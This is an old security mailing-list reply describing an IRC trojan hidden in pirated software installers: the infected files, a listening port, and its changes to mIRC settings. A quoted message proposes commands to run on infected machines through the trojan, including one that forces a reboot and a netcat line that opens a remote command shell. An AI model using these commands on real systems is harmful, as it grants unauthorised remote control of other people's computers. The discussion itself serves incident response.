Re: Internet Wide DOS Attack using IRC

[cluster () VIDEOTRON CA (Samuel Cossette)]

It's not the DO command of mirc, it's a buildin command, it's the equivalent
of /QUOTE or /RAW in a irc client, this is send the data directly to the
server

At this time I have found 2 directly file infected:

Packet Handler Firewall and FlashFXP v1.0, both distributed on a XDCC bot on
#warez950-dcc. In a zip file with some fake .nfo and a SETUP.EXE (oce.exe)
of 354k. quicktools.ocx (EZFTP OLE Control Module), Mswinsck.ocx are also
included.

Another interesting thing, the server open the port 15150, this is prompt:
Enter your username:, probably a FTPD

The trojan can also modify you mirc.ini, this is add auto-op, and modify
your current script.

> With the DO command enabled, they gave us the means to remotely disable
> this trojan.
>
> Something to the effect of;
>
> msg <nick> .do del c:\windows\system\oce*.*
>
> Then, msg <nick> .do <some evil command to lock up the machine, forcing a
> reboot>.

...
> The mIRC DO command is very powerful, and can be used to install netcat on
> the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
> -p <any port> <your ip> -t -e command.com, giving a remote command prompt
> to investigate/disinfect the machine.
>
>
> ___________________________________________________________________________
___
> George Imburgia                                      e-mail:
gti () hopi dtcc edu
> Systems Administrator                                Phone:  (302)739-4068
> Delaware Technical & Community College               Fax:    (302)739-3345
> Office of the President                              Pager:  (302)741-5962

Samuel Cossette
cluster () videotron ca